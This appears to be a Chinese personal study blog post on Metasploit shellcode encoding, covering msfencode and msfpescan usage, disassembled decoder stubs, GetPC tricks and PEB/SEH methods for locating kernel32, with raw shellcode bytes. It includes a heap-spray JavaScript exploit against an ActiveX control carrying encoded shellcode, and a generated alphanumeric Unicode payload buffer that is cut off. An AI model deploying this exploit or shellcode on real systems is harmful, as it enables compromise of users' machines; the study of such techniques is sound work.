matasploit+shellcode编码学习




msfpescan ,msfencode 等命令使用

首先下面额指令都是我用到时记录的,可以说是经常用到吧


先找到memdump.exe文件:

C:\Program Files\Metasploit\Framework3\msf3\tools\memdump\memdump.exe

在CMD下 运行  memdump.exe 进程PID c:\abc

然后进入console

运行   msfpescan -p -m c:/abc  > 1.txt 妈个蛋 要安装ruby 不安装了·······直接用msfpescan -p xx.dll我还觉得方便些


eg:  msfpescan player.dll -p   搜索DLL中所有pop pop ret 指令

Usage: /msf3/msfpescan [mode] <options> [targets]

Modes:
    -j, --jump [regA,regB,regC]      Search for jump equivalent instructions
    -p, --poppopret                  Search for pop+pop+ret combinations
    -r, --regex [regex]              Search for regex match
    -a, --analyze-address [address]  Display the code at the specified address
    -b, --analyze-offset [offset]    Display the code at the specified offset
    -f, --fingerprint                Attempt to identify the packer/compiler
    -i, --info                       Display detailed information about the image
    -R, --ripper [directory]         Rip all module resources to disk 
        --context-map [directory]    Generate context-map files

Options:
    -M, --memdump                    The targets are memdump.exe directories
    -A, --after [bytes]              Number of bytes to show after match (-a/-b)
    -B, --before [bytes]             Number of bytes to show before match (-a/-b)
    -D, --disasm                     Disassemble the bytes at this address
    -I, --image-base [address]       Specify an alternate ImageBase
    -F, --filter-addresses [regex]   Filter addresses based on a regular expression
    -h, --help                       Show this message


下面学习用 msfencode 加密shellcode 的方法:

root@bt:/opt/framework/msf3# ./msfencode -h

    Usage: ./msfencode <options>

OPTIONS:

    -a <opt>  The architecture to encode as
    -b <opt>  The list of characters to avoid: '\x00\xff'
    -c <opt>  The number of times to encode the data
    -d <opt>  Specify the directory in which to look for EXE templates
    -e <opt>  The encoder to use
    -h        Help banner
    -i <opt>  Encode the contents of the supplied file path
    -k        Keep template working; run payload in new thread (use with -x)
    -l        List available encoders
    -m <opt>  Specifies an additional module search path
    -n        Dump encoder information
    -o <opt>  The output file
    -p <opt>  The platform to encode for
    -s <opt>  The maximum size of the encoded data
    -t <opt>  The output format: raw,ruby,rb,perl,pl,c,js_be,js_le,java,dll,exe,exe-small,elf,macho,vba,vbs,loop-vbs,asp,war
    -v        Increase verbosity
    -x <opt>  Specify an alternate executable template

root@bt:/opt/framework/msf3# ./msfencode -l

Framework Encoders
==================

    Name                    Rank       Description
    ----                    ----       -----------
    cmd/generic_sh          good       Generic Shell Variable Substitution Command Encoder
    cmd/ifs                 low        Generic ${IFS} Substitution Command Encoder
    cmd/printf_php_mq       manual     printf(1) via PHP magic_quotes Utility Command Encoder
    generic/none            normal     The "none" Encoder
    mipsbe/longxor          normal     XOR Encoder
    mipsle/longxor          normal     XOR Encoder
    php/base64              great      PHP Base64 encoder
    ppc/longxor             normal     PPC LongXOR Encoder
    ppc/longxor_tag         normal     PPC LongXOR Encoder
    sparc/longxor_tag       normal     SPARC DWORD XOR Encoder
    x64/xor                 normal     XOR Encoder
    x86/alpha_mixed         low        Alpha2 Alphanumeric Mixedcase Encoder
    x86/alpha_upper         low        Alpha2 Alphanumeric Uppercase Encoder
    x86/avoid_utf8_tolower  manual     Avoid UTF8/tolower
    x86/call4_dword_xor     normal     Call+4 Dword XOR Encoder
    x86/context_cpuid       manual     CPUID-based Context Keyed Payload Encoder
    x86/context_stat        manual     stat(2)-based Context Keyed Payload Encoder
    x86/context_time        manual     time(2)-based Context Keyed Payload Encoder
    x86/countdown           normal     Single-byte XOR Countdown Encoder
    x86/fnstenv_mov         normal     Variable-length Fnstenv/mov Dword XOR Encoder
    x86/jmp_call_additive   normal     Jump/Call XOR Additive Feedback Encoder
    x86/nonalpha            low        Non-Alpha Encoder
    x86/nonupper            low        Non-Upper Encoder
    x86/shikata_ga_nai      excellent  Polymorphic XOR Additive Feedback Encoder
    x86/single_static_bit   manual     Single Static Bit
    x86/unicode_mixed       manual     Alpha2 Alphanumeric Unicode Mixedcase Encoder
    x86/unicode_upper       manual     Alpha2 Alphanumeric Unicode Uppercase Encoder

学习几种shellcode编码/加密方式:

每次得到的shellcode 都不相同了, 放在ESI 中的值,得到解码器起始地址的指令位置,记录位置的寄存器 ,循环前面的指令,变量的值都变了


1)    x86/shikata_ga_nai   

00427400    BA 99B20D32     mov edx,0x320DB299
00427405    DBC9            fcmovne st,st(1)
00427407    D97424 F4       fstenv (28-byte) ptr ss:[esp-0xC]  //这句代码得到解码器第一个FPU指令的地址,这个指令能工作的必备条件是前面至少有个FPU指令被执行
                                                               //可以是 fcmovne st,st(1)   fldpi     fldz	ffree st(3) fcmovnb st,st fcmovnbe st,st(5)
0042740B    5D              pop ebp
0042740C    29C9            sub ecx,ecx
0042740E    B1 46           mov cl,0x46
00427410    3155 13         xor dword ptr ss:[ebp+0x13],edx    //xor 解码
00427413    83C5 04         add ebp,0x4
00427416    0355 96         add edx,dword ptr ss:[ebp-0x6A]
00427419  ^\E2 F5           loopd Xtest1231.00427410           //用LOOP 去循环取值

2)x86/alpha_mixed    主要思想是 重新产生原始代码(通过一个循环)

00427400 >  89E0            mov eax,esp
00427402    DBD3            fcmovnbe st,st(3)
00427404    D970 F4         fstenv (28-byte) ptr ds:[eax-0xC]
00427407    5D              pop ebp
00427408    55              push ebp
00427409    59              pop ecx
0042740A    49              dec ecx
0042740B    49              dec ecx
0042740C    49              dec ecx
0042740D    49              dec ecx
0042740E    49              dec ecx
0042740F    49              dec ecx
00427410    49              dec ecx
00427411    49              dec ecx
00427412    49              dec ecx
00427413    49              dec ecx
00427414    43              inc ebx
00427415    43              inc ebx
00427416    43              inc ebx
00427417    43              inc ebx
00427418    43              inc ebx
00427419    43              inc ebx
0042741A    37              aaa
0042741B    51              push ecx
0042741C    5A              pop edx
0042741D    6A 41           push 0x41
0042741F    58              pop eax
00427420    50              push eax
00427421    3041 30         xor byte ptr ds:[ecx+0x30],al
00427424    41              inc ecx
00427425    6B41 41 10      imul eax,dword ptr ds:[ecx+0x41],0x10
00427429    3241 42         xor al,byte ptr ds:[ecx+0x42]
0042742C    3242 42         xor al,byte ptr ds:[edx+0x42]
0042742F    3042 42         xor byte ptr ds:[edx+0x42],al
00427432    41              inc ecx
00427433    42              inc edx
00427434    58              pop eax
00427435    50              push eax
00427436    3841 42         cmp byte ptr ds:[ecx+0x42],al
00427439  ^ 75 E9           jnz Xtest1231.00427424

3)x86/fnstenv_mov   还是解密 产生原始代码

00427400 >  6A 3F           push 0x3F
00427402    59              pop ecx
00427403    D9EE            fldz
00427405    D97424 F4       fstenv (28-byte) ptr ss:[esp-0xC]                  ;都是通过这两条获取当前地址 去操作解密的
00427409    5B              pop ebx
0042740A    8173 13 413EFDC>xor dword ptr ds:[ebx+0x13],0xC3FD3E41             ; Decrypt ->00427416
00427411    83EB FC         sub ebx,-0x4
00427414  ^ E2 F4           loopd Xtest1231.0042740A
00427416    D9EB            fldpi

4)  x86/call4_dword_xor                 

00427400 >  31C9            xor ecx,ecx
00427402    83E9 C1         sub ecx,-0x3F
00427405    E8 FFFFFFFF     call test1231.00427409                    ;这个就不同于上面的 这个是call 得到下一条语句地址
0042740A    C05E 81 76      rcr byte ptr ds:[esi-0x7F],0x76                    ; 
0042740E    0E              push cs
0042740F    D6              salc
00427410    8A28            mov ch,byte ptr ds:[eax]
00427412    AC              lods byte ptr ds:[esi]
00427413    83EE FC         sub esi,-0x4
00427416  ^ E2 F4           loopd Xtest1231.0042740C

5) skylined alpha3

http://bbs.pediy.com/showthread.php?t=156913  用的 半斤八两 集合的 MFC 用的就是这个编码器

~~~小知识  修改MFC  左上角 图标

HICON m_hIcon;
m_hIcon = AfxGetApp()->LoadIcon(IDI_ICON1); //为资源ID 。改成其他图标就用对应的资源ID
SetIcon(m_hIcon, TRUE);

注意使用它时必须 eip 指向 eax 指向 shellcode 起始
可以全部转换为 可视代码~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

00427400    50              push eax                                 ;eax首先就指向 shellcode 起始地址第一字节
00427401    59              pop ecx
00427402    49              dec ecx
00427403    49              dec ecx
00427404    49              dec ecx
00427405    49              dec ecx
00427406    49              dec ecx
00427407    49              dec ecx
00427408    49              dec ecx
00427409    49              dec ecx
0042740A    49              dec ecx
0042740B    49              dec ecx
0042740C    49              dec ecx
0042740D    49              dec ecx
0042740E    49              dec ecx
0042740F    49              dec ecx
00427410    49              dec ecx
00427411    49              dec ecx
00427412    37              aaa
00427413    51              push ecx
00427414    5A              pop edx
00427415    6A 41           push 0x41
00427417    58              pop eax
00427418    50              push eax
00427419    3041 30         xor byte ptr ds:[ecx+0x30],al
0042741C    41              inc ecx
0042741D    6B41 41 10      imul eax,dword ptr ds:[ecx+0x41],0x10
00427421    3241 42         xor al,byte ptr ds:[ecx+0x42]
00427424    3242 42         xor al,byte ptr ds:[edx+0x42]
00427427    3042 42         xor byte ptr ds:[edx+0x42],al
0042742A    41              inc ecx
0042742B    42              inc edx
0042742C    58              pop eax
0042742D    50              push eax
0042742E    3841 42         cmp byte ptr ds:[ecx+0x42],al
00427431  ^ 75 E9           jnz Xtest1231.0042741C
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

GETPC方式~~~~~~~~~~~~~~~~~~~~~~~

1) call $+4   (注意call $+5不好用)

00427400    E8 FFFFFFFF     call test1231.00427404   ;jmp 到  00427404    FFC3            inc ebx  不影响,然后 pop ecx 即可把00427405 返回到 ecx
00427405    C3              retn
00427406    59              pop ecx

2)  FSTENV

00427403    D9EE            fldz                                 ;一个FPU指令
00427405    D97424 F4       fstenv (28-byte) ptr ss:[esp-0xC]     ;会在第一条指令执行之后保存浮点芯片的状态。第一条指令的地址保存在 0xc的偏移量处。 然后一个pop 即可保存地址

3)Backward call

00427400   /EB 03           jmp Xtest1231.00427405     ;1)jmp
00427402   |5E              pop esi<span style="white-space:pre">	</span> <span style="white-space:pre">			</span>    3);弹出esi为 <span style="font-family: Arial, Helvetica, sans-serif;">0042740A</span>
00427403   |FFD6            call esi                                               4)保存00427405 到esp  并且继续执行<span style="font-family: Arial, Helvetica, sans-serif;">0042740A</span><span style="font-family: Arial, Helvetica, sans-serif;">                    </span>
00427405   \E8 F8FFFFFF     call test1231.00427402        ;2)保存 下一条地址 0042740A到 esp
0042740A    49              dec ecx                                  ; test1231.00427405
4) seh getpc

寻找kernel32.dll 因为 我们想找 LoadLibrary 和 GetProcAddress 

lkd> dt _peb
nt!_PEB
   +0x000 InheritedAddressSpace : UChar
   +0x001 ReadImageFileExecOptions : UChar
   +0x002 BeingDebugged    : UChar
   +0x003 SpareBool        : UChar
   +0x004 Mutant           : Ptr32 Void
   +0x008 ImageBaseAddress : Ptr32 Void
   +0x00c Ldr              : Ptr32 _PEB_LDR_DATA
   +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS
   +0x014 SubSystemData    : Ptr32 Void
   ··········
lkd> dt _PEB_LDR_DATA<span style="white-space:pre">	</span>
nt!_PEB_LDR_DATA
   +0x000 Length           : Uint4B
   +0x004 Initialized      : UChar
   +0x008 SsHandle         : Ptr32 Void
   +0x00c InLoadOrderModuleList : _LIST_ENTRY
   +0x014 InMemoryOrderModuleList : _LIST_ENTRY
   +0x01c InInitializationOrderModuleList : _LIST_ENTRY
   +0x024 EntryInProgress  : Ptr32 Void
lkd> dt _ldr_data_table_entry  
nt!_LDR_DATA_TABLE_ENTRY
   +0x000 InLoadOrderLinks : _LIST_ENTRY
   +0x008 InMemoryOrderLinks : _LIST_ENTRY
   +0x010 InInitializationOrderLinks : _LIST_ENTRY
   +0x018 DllBase          : Ptr32 Void
   +0x01c EntryPoint       : Ptr32 Void
   +0x020 SizeOfImage      : Uint4B
   +0x024 FullDllName      : _UNICODE_STRING
   +0x02c BaseDllName      : _UNICODE_STRING
   +0x034 Flags            : Uint4B
   `````````````````

lkd> dt _UNICODE_STRING
nt!_UNICODE_STRING
   +0x000 Length           : Uint2B
   +0x002 MaximumLength    : Uint2B
   +0x004 Buffer           : Ptr32 Uint2B


1) 通过PEB 

(1)通过  ldr + 0xc   InLoadOrderModuleList 结构                                        通用~~~~~~

0040D4AF  |.  33D2          xor edx,edx
0040D4B1  |.  64:8B5A 30    mov ebx,dword ptr fs:[edx+0x30]          ;  PEB
0040D4B5  |.  8B5B 0C       mov ebx,dword ptr ds:[ebx+0xC]           ;  ldr
0040D4B8  |.  8B5B 0C       mov ebx,dword ptr ds:[ebx+0xC]           
###  InLoadOrderModuleList-》_LIST_ENTRY本身就是LDR_DATA_TABLE_ENTRY结构
0040D4BB  |.  8B1B          mov ebx,dword ptr ds:[ebx]              
###  InLoadOrderLinks ->   WIN7:这里 [ebx+0x18]    是地址 SysWOW64\ntdll.dll    XP SP3: system32\ntdll.dll
0040D4BD  |.  8B1B          mov ebx,dword ptr ds:[ebx]              
###  InLoadOrderLinks ->   WIN7:这里 [ebx+0x18]    是地址 SysWOW64\kernel32.dll XP SP3: system32\kernel32.dll
0040D4BF  |.  8B5B 18       mov ebx,dword ptr ds:[ebx+0x18]          ;  +0x018 DllBase          : Ptr32 Void
0040D4C2  |.  8BEB          mov ebp,ebx                              ;  kernel32.74CB0000
33 D2 64 8B 5A 30 8B 5B 0C 8B 5B 0C 8B 1B 8B 1B 8B 5B 18 8B EB

(2) 通过  ldr + 0x14     InMemoryOrderModuleList                                           通用~~~~~~

0040D4AF      33DB                  xor ebx,ebx
0040D4B1      64:8B5B 30            mov ebx,dword ptr fs:[ebx+0x30]
0040D4B5      8B5B 0C               mov ebx,dword ptr ds:[ebx+0xC]            ;  ldr
0040D4B8      8B5B 14               mov ebx,dword ptr ds:[ebx+0x14]           ;  InMemoryOrderModuleList
0040D4BB      8B1B                  mov ebx,dword ptr ds:[ebx]               
### InMemoryOrderLinks  -》  WIN7: 这里 [ebx+0x20] 是地址 SysWOW64\ntdll.dll    XP SP3: system32\ntdll.dll
0040D4BD      8B1B                  mov ebx,dword ptr ds:[ebx]                
### InMemoryOrderLinks  -》  WIN7: 这里 [ebx+0x20] 是地址 SysWOW64\kernel32.dll XP SP3: system32\kernel32.dll
0040D4BF      8B5B 10               mov ebx,dword ptr ds:[ebx+0x10]           
### [ebx+0x10]  是 DllBase
 
 

33 DB 64 8B 5B 30 8B 5B 0C 8B 5B 14 8B 1B 8B 1B 8B 5B 10 8B EB

(3) 下面在 2000也实用,再经构造  对BaseDllName 验证 hash值:                      通用~~~~~~

0040D4AF      FC            cld
0040D4B0      33D2          xor edx,edx
0040D4B2      64:8B52 30    mov edx,dword ptr fs:[edx+0x30]
0040D4B6      8B52 0C       mov edx,dword ptr ds:[edx+0xC]
0040D4B9      8B52 14       mov edx,dword ptr ds:[edx+0x14]          ;  InMemoryOrderModuleList
0040D4BC      8B72 28       mov esi,dword ptr ds:[edx+0x28]          ;  BaseDllName -》Buffer
0040D4BF      6A 18         push 0x18                                ;  kernel32.dll length=12*2
0040D4C1      59            pop ecx
0040D4C2      33FF          xor edi,edi
0040D4C4      33C0          xor eax,eax
0040D4C6      AC            lods byte ptr ds:[esi]
0040D4C7      3C 61         cmp al,0x61                              ;  cmp al,‘a’
0040D4C9      7C 02         jl Xtest1231.0040D4CD
0040D4CB      2C 20         sub al,0x20
0040D4CD      C1CF 0D       ror edi,0xD
0040D4D0      03F8          add edi,eax
0040D4D2    ^ E2 F0         loopd Xtest1231.0040D4C4
0040D4D4      81FF 5BBC4A6A cmp edi,0x6A4ABC5B
0040D4DA      8B5A 10       mov ebx,dword ptr ds:[edx+0x10]          ;  DllBase
0040D4DD      8B12          mov edx,dword ptr ds:[edx]               ;  下一个InMemoryOrderLinks
0040D4DF    ^ 75 DB         jnz Xtest1231.0040D4BC                   ;  ebx 为kernerl32.dll基址

FC 33 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 6A 18 59 33 FF 33 C0 AC 3C 61 7C 02 2C 20 C1 CF
0D 03 F8 E2 F0 81 FF 5B BC 4A 6A 8B 5A 10 8B 12 75 DB

(4) ldr + 0x1c    InInitializationOrderModuleList 通过验证 buffer 长度                    通用~~~~~

0040D4AF      33C9          xor ecx,ecx
0040D4B1      64:8B71 30    mov esi,dword ptr fs:[ecx+0x30]
0040D4B5      8B76 0C       mov esi,dword ptr ds:[esi+0xC]      ;  ldr
0040D4B8      8B76 1C       mov esi,dword ptr ds:[esi+0x1C]     ;  InInitializationOrderModuleList
0040D4BB      8B6E 08       mov ebp,dword ptr ds:[esi+0x8]      ;  esi+0x8 = DllBase
0040D4BE      8B7E 20       mov edi,dword ptr ds:[esi+0x20]     ;  esi+0x20 = BaseDllName ->buffer
0040D4C1      8B36          mov esi,dword ptr ds:[esi]          ;  下一个InInitializationOrderLinks
0040D4C3      384F 18       cmp byte ptr ds:[edi+0x18],cl       ;  modulename[12] == 0? 
                                                                ;  len(KERNELBASE.dll)=14 len(kernel32.dll)=12
0040D4C6    ^ 75 F3         jnz Xtest1231.0040D4BB              ;  ebp = kernel32基址

33 C9 64 8B 71 30 8B 76 0C 8B 76 1C 8B 6E 08 8B 7E 20 8B 36 38 4F 18 75 F3


(5)不通用  而且 有 00 字节b  WIN7 和 xp 有区别    ldr + 0x1c    InInitializationOrderModuleList      不 通用~~~~~~

0040D4AF      33C0          xor eax,eax
0040D4B1      64:8B40 30    mov eax,dword ptr fs:[eax+0x30]
0040D4B5      8B40 0C       mov eax,dword ptr ds:[eax+0xC]     ;  ldr
0040D4B8      8B70 1C       mov esi,dword ptr ds:[eax+0x1C]    ;  InInitializationOrderModuleList 
0040D4BB      AD            lods dword ptr ds:[esi]                  
                                                               ;InInitializationOrderLinks -> 
                                                               ; WIN7:这里FullDllName [ebx+0x18] 是syswow64\KERNELBASE.dll 
                                                               ; XP SP3: system32\kernel32.dll
0040D4BC      8B00          mov eax,dword ptr ds:[eax]       
                                                               ; InInitializationOrderLinks- >
                                                               ; WIN7:这里FullDllName [ebx+0x18] 是syswow64\kernel32.dll   
                                                               ;  XP SP3: 这里 [eax+0x8] 即为 kernerl32.dll基址
0040D4BE      8B40 08       mov eax,dword ptr ds:[eax+0x8]     ;  [eax+0x8] 是DllBase  kernel32.74CB0000

win7 是因为 它是 32位程序,所以按32位来编码的



下面为 SEH 知识,复习下

ntdll!_TEB  
struct _TEB, 66 elements, 0xfb8 bytes  
   +0x000 NtTib            : struct _NT_TIB, 8 elements, 0x1c bytes  
      +0x000 ExceptionList    : Ptr32 to struct _EXCEPTION_REGISTRATION_RECORD,2 elements, 0x8 bytes  
         +0x000 Next             : Ptr32 to struct _EXCEPTION_REGISTRATION_RECORD, 2 elements, 0x8 bytes  
         +0x004 Handler          : Ptr32 to           _EXCEPTION_DISPOSITION   
      +0x004 StackBase        : Ptr32 to Void  
      +0x008 StackLimit       : Ptr32 to Void  
      +0x00c SubSystemTib     : Ptr32 to Void  
      +0x010 FiberData        : Ptr32 to Void  
      +0x010 Version          : Uint4B  

2) 通过SEH

下面的技术要求 最后一个异常处理函数  0xffffffff 指向 kernel32.dll  ,所以查找可让kernel32里面的指针后,

要做的就是往回循环到内核的顶部,比较前两个字节。 

如果最后一个异常处理函数没有指向 kewrnel32.dll 这个技术明显会失败

我的  WIN7  失败~~~~~~~~~~~~~~~~~~~

0040D4AF      56            push esi
0040D4B0      51            push ecx
0040D4B1      33C9          xor ecx,ecx                       ;  ecx = 0
0040D4B3      64:8B31       mov esi,dword ptr fs:[ecx]        ;  esi = NtTib =指向nseh的指针
0040D4B6      AD            lods dword ptr ds:[esi]           ;  eax = 指向下一个nseh(0xffffffff)的指针
0040D4B7      96            xchg eax,esi                      ;  esi =指向下一个nseh(0xffffffff)的指针,
                                                                 eax = NtTib =指向nseh的指针
0040D4B8      390E          cmp dword ptr ds:[esi],ecx        ;  nseh == 0
0040D4BA    ^ 79 FA         jns Xtest1231.0040D4B6
0040D4BC      AD            lods dword ptr ds:[esi]           ;  eax = ffffffff,esi+4 指向seh
0040D4BD      AD            lods dword ptr ds:[esi]           ;  eax = seh地址
0040D4BE      48            dec eax
0040D4BF      66:33C0       xor ax,ax
0040D4C2      66:8138 4D5A  cmp word ptr ds:[eax],0x5A4D
0040D4C7    ^ 75 F5         jnz Xtest1231.0040D4BE            ;  eax=ntdll.dll基址
0040D4C9      59            pop ecx
0040D4CA      5E            pop esi
0040D4CB      C3            retn

56 51 33 C9 64 8B 31 AD 96 39 0E 79 FA AD AD 48 66 33 C0 66 81 38 4D 5A 75 F5 59 5E C3

3) TOPSTACK TEB

XP SP3  行得通  WIN7不行~~~~~

0044F611 >    56            push esi
0044F612      33F6          xor esi,esi
0044F614      64:8B46 04    mov eax,dword ptr fs:[esi+0x4]
0044F618      8B40 E4       mov eax,dword ptr ds:[eax-0x1C]          ;  hander
0044F61B      48            dec eax                                  ;  kernel32._except_handler3; SE 处理程序安装
0044F61C      66:33C0       xor ax,ax
0044F61F      66:8138 4D5A  cmp word ptr ds:[eax],0x5A4D
0044F624    ^ 75 F5         jnz X表白专用.0044F61B
0044F626      5E            pop esi
0044F627      C3            retn

56 33 F6 64 8B 46 04 8B 40 E4 48 66 33 C0 66 81 38 4D 5A 75 F5 5E C3

解释一下:  顶层一场处理结构体总是安排在线程堆栈最高端再-20h处




UNICODE 编码学习~~~~~~:

root@bt:/opt/framework/msf3# ./msfencode -i /root/Desktop/1.dat  -c 1 -b '\x00' -e x86/shikata_ga_nai -t js_le
[*] x86/shikata_ga_nai succeeded with size 195 (iteration=1)

%uc3d9%u74d9%uf424%uf1b8%u721d%u5dcc%uc929%u2bb1%uc583%u3104%u1345%ub403%u900e%uca39%u3e59%u0ac8%ud684%ue3af%u6969%uc158%ue7fd%uae94%u8a0a%u44db%u4ec1%ua094%u920d%u13bd%u6662%u0b11%uf5f0%ub9f0%ucaae%u5928%u77c4%u2afd%u8b91%u6576%u1f3a%ufe81%u172b%u3d3f%u2dc6%u2307%u3763%ua4e2%ucfdc%u3a99%u6a68%u319e%u7022%u46a6%uf176%u680f%udb8b%u9783%u68cc%udcd7%u9bd0%u2d81%u6569%uf588%u62e1%u3f2d%u700e%uf97d%u87fa%u5146%u7bd9%ubdcc%uddaa%u3e0a%ubb70%u7cd9%ucff1%u6087%u0d06%ub434%u38b3%u6f64%u2394%u05a6%u9c11%uacc6%uef8c%u1d2d%u6ba7%u91b3%u1c14%u8110%ub23b%ue5dd%u1aef%ub6b2%uccf0%u6bce%ua4f0%u41d6


可以用···················  可以设置    不要  bad characters

<object classid='clsid:2355C601-37D1-42B4-BEB1-03C773298DC8' id='target' /></object>  
<script>  
var nop = unescape("%u9090");  
var shellcode=unescape("%uc3d9%u74d9%uf424%uf1b8%u721d%u5dcc%uc929%u2bb1%uc583%u3104%u1345%ub403%u900e%uca39%u3e59%u0ac8%ud684%ue3af%u6969%uc158%ue7fd%uae94%u8a0a%u44db%u4ec1%ua094%u920d%u13bd%u6662%u0b11%uf5f0%ub9f0%ucaae%u5928%u77c4%u2afd%u8b91%u6576%u1f3a%ufe81%u172b%u3d3f%u2dc6%u2307%u3763%ua4e2%ucfdc%u3a99%u6a68%u319e%u7022%u46a6%uf176%u680f%udb8b%u9783%u68cc%udcd7%u9bd0%u2d81%u6569%uf588%u62e1%u3f2d%u700e%uf97d%u87fa%u5146%u7bd9%ubdcc%uddaa%u3e0a%ubb70%u7cd9%ucff1%u6087%u0d06%ub434%u38b3%u6f64%u2394%u05a6%u9c11%uacc6%uef8c%u1d2d%u6ba7%u91b3%u1c14%u8110%ub23b%ue5dd%u1aef%ub6b2%uccf0%u6bce%ua4f0%u41d6")
while (nop.length < 0x100000/2)   
{nop += nop;}  
  
nop=nop.substring(0,0x100000-32/2-4/2-2/2-1-shellcode.length);  
nop =nop+ shellcode;  
  var memory = new Array();  
  for (var i=0;i<200;i++)   
{memory[i] += nop;}  

arg1='\x0a';
while(arg1.length < 2000){arg1 += '\x0c';}
arg2 = '\x0c\x0c\x0c\x0c';
arg1 = arg1 + arg2;
target.Data = arg1;
</script>  


用msfencode 生成     unicode  shellcode

root@bt:/opt/framework/msf3# ./msfpayload windows/exec  CMD=calc R |
> ./msfencode -e x86/alpha_mixed -t raw | 
> ./msfencode -e x86/unicode_upper BufferRegister=EAX -t perl
[*] x86/alpha_mixed succeeded with size 454 (iteration=1)

[*] x86/unicode_upper succeeded with size 1039 (iteration=1)

my $buf = 
"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x51\x41" .
"\x54\x41\x58\x41\x5a\x41\x50\x55\x33\x51\x41\x44\x41\x5a" .
"\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51\x41\x49" .
"\x41\x51\x41\x50\x41\x35\x41\x41\x41\x50\x41\x5a\x31\x41" .
"\x49\x31\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49" .
"\x41\x58\x41\x35\x38\x41\x41\x50\x41\x5a\x41\x42\x41\x42" .
"\x51\x49\x31\x41\x49\x51\x49\x41\x49\x51\x49\x31\x31\x31" .
"\x31\x41\x49\x41\x4a\x51\x49\x31\x41\x59\x41\x5a\x42\x41" .
"\x42\x41\x42\x41\x42\x41\x42\x33\x30\x41\x50\x42\x39\x34" .
"\x34\x4a\x42\x54\x49\x4b\x31\x49\x4b\x58\x4e\x49\x49\x52" .
"\x51\x5a\x54\x51\x4e\x50\x56\x52\x39\x50\x49\x50\x49\x51" .
"\x39\x50\x49\x51\x39\x51\x39\x50\x49\x51\x39\x50\x49\x50" .
"\x49\x51\x33\x51\x33\x50\x43\x50\x43\x50\x43\x50\x43\x50" .
"\x37\x52\x31\x51\x4a\x51\x5a\x51\x31\x50\x58\x50\x50\x50" .
"\x30\x51\x31\x50\x30\x51\x31\x52\x4b\x51\x31\x51\x31\x50" .
"\x51\x50\x32\x51\x31\x50\x42\x50\x32\x51\x32\x51\x32\x50" .
"\x30\x51\x32\x50\x42\x51\x31\x51\x32\x50\x58\x52\x30\x50" .
"\x38\x51\x31\x50\x42\x54\x35\x50\x4a\x51\x39\x50\x49\x52" .
"\x4c\x50\x4b\x51\x48\x50\x4e\x43\x39\x50\x43\x50\x30\x50" .
"\x45\x52\x30\x51\x37\x54\x30\x51\x33\x50\x50\x50\x4d\x50" .
"\x59\x50\x49\x43\x45\x51\x46\x52\x31\x52\x38\x51\x42\x51" .
"\x33\x50\x54\x50\x4c\x50\x4b\x50\x52\x43\x42\x52\x36\x50" .
"\x50\x50\x4c\x50\x4b\x51\x33\x51\x52\x50\x54\x50\x4c\x50" .
"\x4e\x52\x4b\x50\x52\x52\x52\x51\x46\x43\x44\x50\x4c\x50" .
"\x4b\x51\x44\x50\x32\x50\x45\x43\x48\x50\x56\x52\x4f\x50" .
"\x4d\x43\x37\x50\x52\x52\x4a\x50\x56\x50\x46\x51\x46\x50" .
"\x51\x51\x39\x52\x4f\x50\x50\x50\x31\x51\x39\x52\x30\x50" .
"\x4e\x50\x4c\x51\x37\x50\x4c\x50\x50\x51\x51\x50\x51\x52" .
"\x4c\x51\x37\x52\x52\x50\x56\x50\x4c\x50\x45\x52\x50\x51" .
"\x39\x52\x31\x52\x38\x50\x4f\x50\x56\x52\x4d\x50\x45\x50" .
"\x51\x50\x49\x51\x47\x51\x39\x43\x42\x50\x4c\x50\x30\x51" .
"\x42\x52\x52\x50\x43\x52\x47\x50\x4e\x52\x4b\x50\x51\x51" .
"\x32\x52\x32\x50\x30\x50\x4e\x52\x4b\x50\x43\x43\x42\x50" .
"\x45\x52\x4c\x50\x56\x51\x51\x51\x4a\x52\x50\x50\x4c\x50" .
"\x4b\x50\x51\x52\x30\x52\x32\x51\x48\x50\x4c\x50\x45\x50" .
"\x4b\x52\x50\x50\x52\x52\x34\x52\x30\x50\x4a\x50\x45\x52" .
"\x31\x52\x38\x52\x30\x52\x30\x50\x50\x50\x4c\x50\x4b\x51" .
"\x33\x54\x38\x50\x47\x52\x48\x50\x4c\x50\x4b\x50\x43\x43" .
"\x38\x50\x45\x54\x30\x52\x36\x51\x51\x50\x49\x50\x43\x50" .
"\x4d\x50\x33\x51\x37\x50\x4c\x52\x31\x51\x49\x50\x4e\x52" .
"\x4b\x52\x36\x52\x34\x50\x4e\x52\x4b\x50\x45\x52\x31\x52" .
"\x38\x51\x46\x50\x45\x51\x51\x50\x4b\x50\x4f\x52\x34\x52" .
"\x51\x50\x4f\x50\x30\x50\x4e\x50\x4c\x50\x4f\x50\x31\x50" .
"\x58\x50\x4f\x52\x36\x52\x4d\x51\x33\x50\x31\x50\x4f\x50" .
"\x37\x50\x50\x50\x38\x50\x4d\x50\x30\x50\x43\x51\x35\x51" .
"\x48\x54\x34\x51\x44\x50\x43\x50\x43\x50\x4d\x51\x4a\x50" .
"\x58\x50\x47\x50\x4b\x50\x51\x52\x4d\x52\x31\x50\x34\x50" .
"\x54\x50\x35\x50\x58\x52\x42\x50\x50\x52\x38\x50\x4e\x52" .
"\x4b\x50\x56\x50\x38\x51\x35\x54\x34\x51\x35\x50\x51\x51" .
"\x48\x50\x53\x52\x30\x43\x36\x50\x4c\x50\x4b\x51\x46\x52" .
"\x4c\x52\x32\x52\x4b\x50\x4e\x52\x4b\x50\x50\x52\x38\x51" .
"\x35\x50\x4c\x51\x37\x52\x51\x50\x49\x50\x43\x50\x4c\x50" .
"\x4b\x50\x47\x54\x34\x50\x4e\x52\x4b\x51\x37\x54\x31\x50" .
"\x4e\x50\x30\x50\x4e\x43\x39\x50\x52\x52\x44\x51\x37\x51" .
"\x44\x50\x51\x50\x34\x50\x51\x50\x4b\x52\x31\x50\x4b\x50" .
"\x45\x50\x31\x50\x50\x50\x59\x51\x33\x51\x5a\x52\x32\x52" .
"\x51\x51\x39\x52\x4f\x50\x4b\x50\x50\x52\x30\x51\x48\x51" .
"\x33\x52\x4f\x51\x42\x52\x5a\x50\x4c\x50\x4b\x50\x45\x50" .
